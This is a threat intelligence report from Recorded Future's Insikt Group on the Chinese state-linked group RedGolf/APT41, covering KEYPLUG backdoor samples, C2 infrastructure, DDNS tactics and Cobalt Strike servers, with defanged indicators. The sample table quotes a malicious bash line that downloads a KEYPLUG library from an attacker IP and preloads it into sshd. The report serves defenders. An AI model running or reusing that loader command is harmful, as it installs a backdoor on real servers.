##### CYBER

 THREAT

 ANALYSIS

**CHINA** By Insikt Group®

March 30, 2023

# With KEYPLUG, China’s  RedGolf Spies On, 


-----

## Executive Summary

Recorded Future’s Insikt Group has identified a large cluster of new operational infrastructure
associated with use of the custom Windows and Linux backdoor KEYPLUG. We attribute this activity to
a threat activity group tracked as RedGolf, which is highly likely to be a Chinese state-sponsored group.
RedGolf closely overlaps with threat activity reported in open sources under the aliases APT41/BARIUM
and has likely carried out state-sponsored espionage activity in parallel with financially motivated
operations for personal gain from at least 2014 onward. A 2020 US Department of Justice (DOJ)
[indictment states that a RedGolf-associated threat actor boasted](https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer) of connections to the Chinese
[Ministry of State Security (MSS); the indicted actors were also linked](https://intrusiontruth.wordpress.com/2022/07/23/the-people-behind-chengdu-404/) to the Chengdu-based company
Chengdu 404 Network Technology (成都市肆零肆网络科技有限公司).

The group remains highly active within a wide range of geographies and industry verticals, targeting
aviation, automotive, education, government, media, information technology, and religious organizations
[(1, 2, 3). Organizations operating in these industries — particularly those whose products or activities](https://www.mandiant.com/resources/blog/mobileiron-log4shell-exploitation)
may be of strategic interest to the Chinese government and security services — are at increased risk of
targeting. RedGolf has historically exploited public and zero-day vulnerabilities in internet-facing
devices for initial access, including Citrix, Cisco, and Zoho. Maintaining a frequent patching cadence for
these devices is essential for addressing known security issues.

RedGolf [used](https://www.mandiant.com/resources/blog/apt41-us-state-governments) a Linux version of the custom, modular backdoor KEYPLUG to target US state
government entities during 2021 and 2022. Insikt Group has identified a wider cluster of KEYPLUG
samples and infrastructure used by RedGolf from at least 2021 to 2023. We track this malicious
infrastructure using the term GhostWolf. Alongside KEYPLUG, we also identified RedGolf using Cobalt
Strike, PlugX, and Dynamic DNS (DDNS) domains, all of which are commonly used by many Chinese
state-sponsored threat groups. Insikt Group identified multiple infrastructure overlaps between publicly
reported APT41/BARIUM campaigns across the GhostWolf infrastructure cluster.

| f


-----

**Figure 1: RedGolf infrastructure and tactics, techniques, and procedures (TTPs) overlaps with APT41 and BARIUM (Source:**
Recorded Future)

| f


-----

## Threat/Technical Analysis

#### KEYPLUG Malware

KEYPLUG is a custom, modular backdoor deployed by RedGolf that has Windows and Linux versions.
[RedGolf heavily used KEYPLUG between May 2021 and February 2022 in a campaign that compromised](https://www.mandiant.com/resources/blog/apt41-us-state-governments)
at least 6 US state governments. KEYPLUG C2 traffic supports at least 5 network protocols, including
HTTP, TCP, KCP over UDP, and WSS.

[From the KEYPLUG samples published](https://www.mandiant.com/resources/blog/apt41-us-state-governments) by Mandiant and by hunting for samples communicating with
GhostWolf infrastructure, we identified 9 more KEYPLUG samples that are highly likely used by RedGolf.

**Malware** **SHA256** **Filename** **Network Indicators** **Comments**
**Variant**

KEYPLUG.LINUX `e024ccc4c72eb` kernel linux.down-flash[.]com Hosted on:
`5813cc2b6db79` http://103.226.155[.]96:80
`75e4750337a1c` 103.226.155[.]96:1443 00/kernel
```
          c619d7339b21f

```
`dbb32d93fd85` Hash originally listed on

[the Mandiant APT41 blog](https://www.mandiant.com/resources/blog/apt41-us-state-governments)

Bash Script `39c8a31dee110` update.sh Downloads KEYPLUG Bash script content:
`93810c7b142b4` ‘update.so’ from
`fe8770e8c8d1b` 103.226.155[.]96 `cd /lib/security`
```
          3c09749a2888e wget
          cc32d24f4d09 http://103.226.155[.]96/u
                                         pdate.so
                                         LD_PRELOAD=/lib/security/
                                         update.so /usr/sbin/sshd

```
KEYPLUG.LINUX `006e096f82e9f` update.so WSS[:]//chrome.down-flash[.] The configuration for this
`2bb3bb3f4fd48` com:443 sample specifies the use
`85a81b426b425` of WSS (WebSocket)
`b2b7a7bfd90b4` protocol.
`b65d44ab5e7e` 103.226.155[.]96

KEYPLUG.LINUX `9a94070f547f8` update chrome.down-flash[.]com
```
          e517bcf4dabfd

```
`36a7f2b83bb9e` 103.226.155[.]96
```
          0eae6e4685cc2
          33b07b0a2897

```
| f

|Malware Variant|SHA256|Filename|Network Indicators|Comments|
|---|---|---|---|---|
|KEYPLUG.LINUX|e024ccc4c72eb 5813cc2b6db79 75e4750337a1c c619d7339b21f dbb32d93fd85|kernel|linux.down-flash[.]com 103.226.155[.]96:1443|Hosted on: http://103.226.155[.]96:80 00/kernel Hash originally listed on the Mandiant APT41 blog|
|Bash Script|39c8a31dee110 93810c7b142b4 fe8770e8c8d1b 3c09749a2888e cc32d24f4d09|update.sh|Downloads KEYPLUG ‘update.so’ from 103.226.155[.]96|Bash script content: cd /lib/security wget http://103.226.155[.]96/u pdate.so LD_PRELOAD=/lib/security/ update.so /usr/sbin/sshd|
|KEYPLUG.LINUX|006e096f82e9f 2bb3bb3f4fd48 85a81b426b425 b2b7a7bfd90b4 b65d44ab5e7e|update.so|WSS[:]//chrome.down-flash[.] com:443 103.226.155[.]96|The configuration for this sample specifies the use of WSS (WebSocket) protocol.|
|KEYPLUG.LINUX|9a94070f547f8 e517bcf4dabfd 36a7f2b83bb9e 0eae6e4685cc2 33b07b0a2897|update|chrome.down-flash[.]com 103.226.155[.]96||


-----

|KEYPLUG|2345c426c584e c12f7a2106a52 ce8ac4aeb1444 76d1a4e4b78c1 0addfddef920|alibaba.exe|WSS[:]//chrome.down-flash[.] com:443|Hosted on http://103.226.155[.]96/ali baba.exe Packaged with VMProtect (3.2.0-3.5.0) Microsoft Linker (14.0)|
|---|---|---|---|---|
|KEYPLUG.LINUX|f4474dcbfaf85 70fa4bcdd4151 d53516664ef5c b7f21f3b4520f 791626fdc441|dns_x64.old|TCP[:]//linux.down-flash[.]com :1443||
|KEYPLUG.LINUX|a1398dd8cec06 c07a33b94e9d5 9d38313efcce9 27cc27425ade4 8dba48c3345f|nac|TCP[:]//193.200.149[.]195:80||
|KEYPLUG.LINUX|a6ead353dd733 8b7ae51825528 9993f7cca70bd eceaf31004ec0 b8a1036378d3|logo.png|TCP[:]//202.79.173[.]228:8081||
|KEYPLUG|5921d1686f9f4 b6d26ac353cfc e3e85e5790631 1a80806903c9b 40f85429b225|svchost.exe|TCP[:]//43.229.155[.]38:8443 HTTPS[:]//cdn.google-au[.]ga: 8443|Packaged with VMProtect (3.2.0-3.5.0) Microsoft Linker (10.0)|
|KEYPLUG|83ef976a3c3ca 9fcd438eabc9b 935ca5d46a3fb 00e2276ce4061 908339de43ec|host_UDP_53 _win_x64.dll|UDP[:]//fonts.google-au[.]ga:53|DLL packaged with VMProtect (3.2.0-3.5.0) Microsoft Linker (10.0)|
|KEYPLUG|4ffc7f65e16ce 59ff9e6a504f8 8e0cf56b225c0 eb2cf8ec578b3 e9d40d9bd898|Decrypted from config.dat|HTTPS[:]//static.tcplog[.]com: 443|Sample and domain referenced in UK NCSC Goofy Guineapig report|


**Table 1: KEYPLUG samples, associated files, and network infrastructure (Source: Recorded Future)**

We identified 3 KEYPLUG samples that employed VMProtect, which RedGolf has [commonly used to](https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Winnti.pdf)
[package malware to hinder detection and analysis. The version of VMProtect we detected likely was](https://www.mandiant.com/resources/blog/apt41-us-state-governments)
the same as in previous detections, but the version of Microsoft Linker ranged between 10.0 and 14.0.
The sample, “alibaba.exe”, is likely a later version of KEYPLUG given that it was packaged with a newer
version of Microsoft Linker and had the WSS C2 capability described by [Mandiant.](https://www.mandiant.com/resources/blog/apt41-us-state-governments)

| f


-----

**Figure 2: Comparison of VMProtect-packaged versions of KEYPLUG (Source: Recorded Future)**


-----

#### GhostWolf Infrastructure

We identified a commonality across multiple servers found within RedGolf’s infrastructure. We track this
unique infrastructure TTP as GhostWolf; this configuration has been in use since at least December
2020 and is still in use.

This GhostWolf configuration is very likely linked to KEYPLUG C2 infrastructure given frequent overlaps
with publicly identified KEYPLUG samples and the additional samples identified in Table 1 above. Some
GhostWolf infrastructure has also been linked to other RedGolf-associated malware, including PlugX.
**Figure 3 below shows the number of unique GhostWolf IP addresses observed over the past 2 years.**
There is a distinct reduction in the number of servers detected towards the end of 2022, a trend that is
also reflected in the previous year’s data.

**Figure 3: RedGolf GhostWolf infrastructure detections, December 2020 to February 2023 (Source: Recorded Future)**

Throughout January 2022 to February 2023, we observed 11 hosting providers used for 42 GhostWolf
IP addresses; there was no discernible trend in the choice of providers used, but the majority of
infrastructure was located in Asia, with the remainder in the United States, as depicted in Figure 5. The
spread of providers is likely a conscious decision by the threat actors to diversify their malicious
infrastructure.

| f


-----

On 4 occasions, we identified consecutively or closely assigned IP addresses used for GhostWolf
infrastructure (for example, 23.225.199[.]162, 23.225.199[.]164, 23.225.199[.]165). We have previously
observed block assignment of IP addresses to a threat actor when the associated infrastructure is
purchased from a hosting reseller. Buying infrastructure from a reseller rather than directly from the
provider reduces the risk of the infrastructure being traced back to an individual. Figure 5 below shows
the overlap in hosting providers and their use throughout January 2022 to February 2023.

**Figure 4: Geographical spread of 42 GhostWolf IP addresses between January 2022 andFebruary 2023 (Source: Recorded**
[Future; image created using Plotly/Plotly.py under the MIT License)](https://github.com/plotly/plotly.py/blob/master/LICENSE.txt)

**Figure 5: Hosting providers used for 42 GhostWolf IP addresses between January 2022 and February 2023 (Source: Recorded**
[Future; image created using Plotly/Plotly.py under the MIT License)](https://github.com/plotly/plotly.py/blob/master/LICENSE.txt)

| f


-----

A full list of GhostWolf infrastructure can be found in Appendix A.

#### DDNS Tradecraft

Through persistent monitoring of previously reported infrastructure that has been publicly attributed to
[APT41 and BARIUM (1, 2), we identified a cluster of Dynamic DNS (DDNS) domains and infrastructure](https://techcommunity.microsoft.com/t5/microsoft-sentinel-blog/hunting-for-barium-using-azure-sentinel/ba-p/1875913)
highly likely used across multiple campaigns by RedGolf. Over the past 2 years, this cluster has included
command and control (C2) servers for Cobalt Strike and PlugX malware and has links to infrastructure
used for KEYPLUG malware.

We track DNS resolution changes for domains in this cluster, 2 of which (ltupdate[.]ddns[.]net and
cloudat[.]ddns[.]net ) have been active in January 2023. These domains resolved to a Cobalt Strike C2
IP address, 193.239.154[.]221, which Recorded Future first identified on May 2, 2022. Further
information about RedGolf's Cobalt Strike activity is included in the following section of this report.

**Figure 6: Intelligence Card for Cobalt Strike C2 IP address 192.239.154[.]221 (Source: Recorded Future)**

| f


-----

RedGolf threat actors have been frequently observed updating their DDNS domains to resolve to
operational infrastructure for short periods of time, typically less than 24 hours, before parking the
domains on loopback IP address 127.0.0[.]1 while not in use. This is a common tactic employed by threat
actors to subvert security teams and reduce the exposure of their infrastructure.

Alongside its DDNS use, we have also observed RedGolf using both traditionally registered domains and
free-to-register domains from TLDs such as .tk, .cf and .ml. Over the past 4 months, however, RedGolf’s
use of DDNS domains has decreased, with resolution changes and new domains becoming less
frequent. Further, in March 2023, Freenom, a provider of free-to-register domains including .tk, .cf, and
[.ml, halted](https://krebsonsecurity.com/2023/03/sued-by-meta-freenom-halts-domain-registrations/) the registration of new free domains after a lawsuit filed by social media giant Meta. A full list
of indicators has been provided in Appendix A.

## Cobalt Strike

Insikt Group identified 2 active Cobalt Strike C2 servers likely used by RedGolf, which both implemented
a jQuery Malleable profile. Historically, the majority of RedGolf-associated Cobalt Strike C2s found in
this cluster of infrastructure have also used a jQuery Malleable profile and in some cases were also
detected using [cs2modrewrite. Threat actors use malleable profiles with Cobalt Strike to change the](https://github.com/threatexpress/cs2modrewrite)
appearance of its network traffic in order to evade detection. Modifying the way the traffic looks can
make it appear less suspicious and blend in with normal network traffic, making it harder for defenders
to identify and detect the malicious activity.

The most recently active RedGolf Cobalt Strike infrastructure has been active for substantially longer
than other RedGolf Cobalt Strike C2s we detected.

| f


-----

|C2 IP Address|Active Time Frame|Comments|
|---|---|---|
|193.239.154[.]221|May 3, 2022 to February 8, 2023|jQuery Malleable Profile|
|27.124.37[.]62|September 7, 2022 to February 14, 2023|jQuery Malleable Profile cs2modrewrite These 3 IP addresses all likely resolve to the same Cobalt Strike C2 server. All 3 IP addresses use the same SSH (Secure Shell) fingerprint: fe35c99c1d5cdb1c7f817457b0f59f593fed8afac915 61d573d4c50110fdcab9|
|27.124.37[.]63|||
|27.124.37[.]65|||
|Historical|||
|116.204.211[.]62|July 1, 2022, to July 14, 2022|Cobalt Strike Beacon 59b13045104462b40b1bcd6776f2b9e0b0df126dfa4e 33768b54796e23591b87 (Linux) Observed targeting mail servers in Recorded Future Network Intelligence data.|
|45.76.178[.]177|June 25, 2022|Linked with 116.204.211[.]62 via resolution overlaps with mirros.microsoftcontents[.]com and shared target victim IP address.|
|116.204.211[.]68|January 4, 2022, to January 14, 2022||
|116.204.211[.]59|November 28, 2021, to December 7, 2021|Cobalt Strike Beacon 99b36963f0e93a5c59cbd205d102f6b850f02f5e74ac 4f66257b6f38d9c9ef5a (Linux)|
|45.77.38[.]191|November 4, 2021|jQuery Malleable Profile Cobalt Strike Beacon d4eced054766f6253f7d0772d4636be88ea7e75e07ca 4ce86b65312c808fb96a (Windows) 7a81ee7251670cebb1746c88fe84aa78ecededd3ec06 3f156714a900af5de08d (Windows)|
|139.59.116[.]0|March 1, 2021, to March 12, 2021|jQuery Malleable Profile|


**Table 2: RedGolf-associated Cobalt Strike C2s 2021 to February 2023 (Source: Recorded Future)**


| f


-----

#### Links to APT41/BARIUM Activity

A March 2022 Mandiant [report](https://www.mandiant.com/resources/blog/apt41-us-state-governments) detailing APT41’s targeting US state governments included KEYPLUG
samples and linked infrastructure; we identified one of the KEYPLUG.LINUX samples mentioned in the
report (SHA256: e024ccc4c72eb5813cc2b6db7975e4750337a1cc619d7339b21fdbb32d93fd85),
hosted on IP address 103.226.155[.]96 during September 2022 with a small number of other KEYPLUG
samples.

A November 2020 [blog from Microsoft’s Threat Intelligence Center (MSTIC) detailed methods for](https://techcommunity.microsoft.com/t5/microsoft-sentinel-blog/hunting-for-barium-using-azure-sentinel/ba-p/1875913)
hunting BARIUM using Microsoft’s Azure Sentinel platform and provided indicators of compromise
within detection rules. We observed infrastructure overlaps between the domains (portomnail[.]com
and openmd5[.]com ) reported by MSTIC and PlugX C2 infrastructure, IP address 137.220.178[.]43 . We
observed this C2 targeting mail servers in early to mid-2021, with this activity [likely](https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/) tied to the
exploitation of 4 Microsoft Exchange Server vulnerabilities (CVE-2021-26855, CVE-2021-26857,
CVE-2021-26858, CVE-2021-27065) released in March 2021. These domains also have hosting overlaps
with IP addresses observed within the identified DDNS cluster.

| f


-----

## Mitigations

A previous [Insikt Group report provides a comprehensive breakdown of detection and mitigation](https://go.recordedfuture.com/hubfs/reports/mtp-2021-0914.pdf)
techniques related to Cobalt Strike.

Recorded Future proactively detects both Cobalt Strike and PlugX servers and are logged in the
Command and Control Security Control Feed. Recorded Future clients can incorporate this feed into
blocking lists and alerting to help prevent infections.

## Outlook

RedGolf will likely continue to target victims with KEYPLUG malware and its derivatives using command
and control infrastructure spanning a variety of hosting providers and likely purchased through a
hosting reseller. The group has previously used a mixture of traditionally registered domains and DDNS
domains, often featuring a technology theme. This TTP is likely to remain relatively unchanged, with the
exception of a decrease in DDNS use.

The use of Cobalt Strike and PlugX to target victim machines by Chinese state-sponsored threat
activity groups such as RedGolf is highly likely to [continue](https://www.recordedfuture.com/2022-adversary-infrastructure-report) given the feature set provided by these tools,
their ready availability, and the ability to obfuscate responsibility due to the number of other threat
actors using these techniques.

| f


-----

## Appendix A (Indicators Of Compromise)


| f


-----

| f


-----

| f


-----

| f


-----

About Insikt Group[®]

Insikt Group is Recorded Future’s threat research division, comprising analysts and
security researchers with deep government, law enforcement, military, and intelligence
agency experience. Their mission is to produce intelligence on a range of cyber and
geopolitical threats that reduces risk for clients, enables tangible outcomes, and
prevents business disruption. Coverage areas include research on state-sponsored
threat groups; financially-motivated threat actors on the darknet and criminal
underground; newly emerging malware and attacker infrastructure; strategic geopolitics;
and influence operations.

About Recorded Future[®]

Recorded Future is the world’s largest intelligence company. Recorded Future’s
cloud-based Intelligence Platform provides the most complete coverage across
adversaries, infrastructure, and targets. By combining persistent and pervasive
automated data collection and analytics with human analysis, Recorded Future provides
real-time visibility into the vast digital landscape and empowers clients to take proactive
action to disrupt adversaries and keep their people, systems, and infrastructure safe.
Headquartered in Boston with offices and employees around the world, Recorded Future
works with more than 1,500 businesses and government organizations across more than
60 countries.

Learn more at recordedfuture.com and follow us on Twitter at @RecordedFuture


real-time visibility into the vast digital landscape and empowers clients to take proactive
action to disrupt adversaries and keep their people, systems, and infrastructure safe.
Headquartered in Boston with offices and employees around the world, Recorded Future
works with more than 1,500 businesses and government organizations across more than
60 countries.

Learn more at recordedfuture.com and follow us on Twitter at @RecordedFuture


-----